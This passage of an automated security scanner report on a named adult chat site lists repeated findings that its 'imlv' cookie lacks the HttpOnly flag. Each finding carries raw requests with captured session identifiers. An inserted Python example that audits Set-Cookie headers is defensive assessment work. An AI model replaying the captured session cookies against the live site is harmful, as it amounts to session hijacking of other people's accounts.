ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:53 GMT
Connection: close
Content-Length: 72506
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.356. http://imlive.com/live-sex-chats/free-sex-video/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/free-sex-video/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: imlv. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /live-sex-chats/free-sex-video/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoidMay82O9Ww8iIgmnpOkaYYd%2bRloG%2b4CAmxrVQ%2bGzRheecUYgUyCFOOp2ODZpcVY%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:47 GMT
Connection: close
Content-Length: 51624
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.357. http://imlive.com/live-sex-chats/gay-couple/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/gay-couple/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: imlv. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /live-sex-chats/gay-couple/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:18 GMT
Connection: close
Content-Length: 33498
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.358. http://imlive.com/live-sex-chats/gay/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/gay/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: imlv. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /live-sex-chats/gay/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:18:55 GMT
Connection: close
Content-Length: 194997
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.359. http://imlive.com/live-sex-chats/guy-alone/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/guy-alone/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: imlv. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /live-sex-chats/guy-alone/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:18:44 GMT
Connection: close
Content-Length: 69731
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
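The finding above (repeated below for every path crawled on this host) is a plain response-header check and can be reproduced without the scanner. The Python that follows is an added example, not code from the report or from the scanner vendor: it parses the Set-Cookie headers of a raw HTTP response, lists which cookies lack HttpOnly (and Secure, when the origin is HTTPS), and applies the same "does this look like a session token" severity downgrade the report's wording describes. The sample response is a constructed, truncated copy of the one shown above; the second Set-Cookie line (a hardened ASP.NET_SessionId) is invented for contrast and does not appear in the report, and the session-name patterns are this example's own assumptions, since the scanner's rule is not published.

```python
"""Audit Set-Cookie headers in a raw HTTP response for missing HttpOnly/Secure.

Added example; not part of the scanner report. The sample below is a constructed,
abbreviated copy of the report's response (cookie value truncated). The second
Set-Cookie line is invented for contrast and is NOT in the report.
"""
import re

SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Cache-Control: private\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Server: Microsoft-IIS/7.0\r\n"
    "Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD...; path=/\r\n"
    "Set-Cookie: ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; path=/; HttpOnly; Secure\r\n"
    "X-Powered-By: vsr48\r\n"
    "Connection: close\r\n"
    "\r\n"
    "<!DOCTYPE html>...\r\n"
)

# Assumed naming heuristics for "looks like a session token". The scanner's own
# rule is not in the report, so this list is this example's guess.
SESSION_NAME_PATTERNS = [
    re.compile(r"^ASP\.NET_SessionId$", re.I),
    re.compile(r"^ASPSESSIONID", re.I),
    re.compile(r"^(PHPSESSID|JSESSIONID)$", re.I),
    re.compile(r"sess(ion)?", re.I),
]


def parse_set_cookies(raw_response):
    """Return one dict per Set-Cookie header: name, value, and lowercased attrs."""
    head = re.split(r"\r?\n\r?\n", raw_response, maxsplit=1)[0]
    cookies = []
    for line in re.split(r"\r?\n", head)[1:]:      # [1:] skips the status line
        hname, sep, hvalue = line.partition(":")
        if not sep or hname.strip().lower() != "set-cookie":
            continue
        pieces = [p.strip() for p in hvalue.strip().split(";")]
        name, _, value = pieces[0].partition("=")
        attrs = {}
        for piece in pieces[1:]:
            if not piece:
                continue
            key, _, val = piece.partition("=")
            attrs[key.strip().lower()] = val.strip()   # flags such as HttpOnly have val == ""
        cookies.append({"name": name.strip(), "value": value, "attrs": attrs})
    return cookies


def looks_like_session(name):
    """True if the cookie name matches one of the assumed session-token patterns."""
    return any(p.search(name) for p in SESSION_NAME_PATTERNS)


def audit_cookies(raw_response, served_over_https=False):
    """Flag cookies missing HttpOnly (and Secure when the origin is HTTPS).

    Severity mirrors the report's reasoning: missing HttpOnly on a cookie that
    does not look like a session token is 'Information'; on a session-like
    cookie it is raised to 'Low', because that is what an XSS could read.
    """
    findings = []
    for c in parse_set_cookies(raw_response):
        missing = []
        if "httponly" not in c["attrs"]:
            missing.append("HttpOnly")
        if served_over_https and "secure" not in c["attrs"]:
            missing.append("Secure")
        if not missing:
            continue
        session = looks_like_session(c["name"])
        findings.append({
            "name": c["name"],
            "missing": missing,
            "looks_like_session": session,
            "severity": "Low" if session else "Information",
        })
    return findings


if __name__ == "__main__":
    # The report's origin is plain http://, so Secure is not evaluated here.
    for f in audit_cookies(SAMPLE_RESPONSE, served_over_https=False):
        print(f"{f['name']}: missing {', '.join(f['missing'])} "
              f"(session-like={f['looks_like_session']}, severity={f['severity']})")
```

Run against the sample, the only finding is imlv missing HttpOnly at Information severity, which is what the report says. Two caveats the report's wording leaves implicit: the check only covers cookies set in this particular response, so a clean result here says nothing about how the ASPSESSIONID* and ASP.NET_SessionId cookies carried in the request were issued on their own Set-Cookie, and those are the ones an XSS on this origin would want. If the application is ASP.NET on IIS 7 (an assumption suggested by the Server header and the ASP.NET_SessionId cookie, not stated in the report), `<httpCookies httpOnlyCookies="true" />` under `<system.web>` in web.config makes the framework add HttpOnly to every cookie it emits; the classic-ASP ASPSESSIONID cookies are set by IIS itself and need an outbound rewrite rule or equivalent to get the flag.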

11.360. http://imlive.com/live-sex-chats/happyhour/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/happyhour/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /live-sex-chats/happyhour/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:55 GMT
Connection: close
Content-Length: 22310
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.361. http://imlive.com/live-sex-chats/lesbian-couple/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/lesbian-couple/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /live-sex-chats/lesbian-couple/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:23 GMT
Connection: close
Content-Length: 118643
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.362. http://imlive.com/live-sex-chats/lesbian/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/lesbian/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /live-sex-chats/lesbian/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:18:57 GMT
Connection: close
Content-Length: 32831
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.363. http://imlive.com/live-sex-chats/live-sex-video/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/live-sex-video/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /live-sex-chats/live-sex-video/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:28 GMT
Connection: close
Content-Length: 24939
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.364. http://imlive.com/live-sex-chats/nude-chat/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/nude-chat/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /live-sex-chats/nude-chat/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

